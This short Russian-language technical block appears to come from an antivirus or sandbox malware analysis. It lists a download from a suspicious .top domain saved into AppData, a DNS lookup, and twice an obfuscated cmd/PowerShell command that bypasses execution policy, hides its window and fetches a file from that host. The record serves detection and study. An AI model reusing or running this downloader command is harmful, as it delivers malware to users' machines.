Техническая информация
- http://roggistazli.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^oWErs^HelL^.ex^E -eXe^CuTIoNP^OLICY B^yP^AsS ^-^N^OPrO^fIle -W^In^dO^W^StYle ^H^iDDE^n (NE^w^-^ObJect SysteM^.^NET.we^BClIe^nt^).DOw^n^LOAd^FiLE(^'http://roggistazli.top/s...
- DNS ASK ro###stazli.top
- '<SYSTEM32>\cmd.exe' /c "p^oWErs^HelL^.ex^E -eXe^CuTIoNP^OLICY B^yP^AsS ^-^N^OPrO^fIle -W^In^dO^W^StYle ^H^iDDE^n (NE^w^-^ObJect SysteM^.^NET.we^BClIe^nt^).DOw^n^LOAd^FiLE(^'http://roggistazli.top/s...' (со скрытым окном)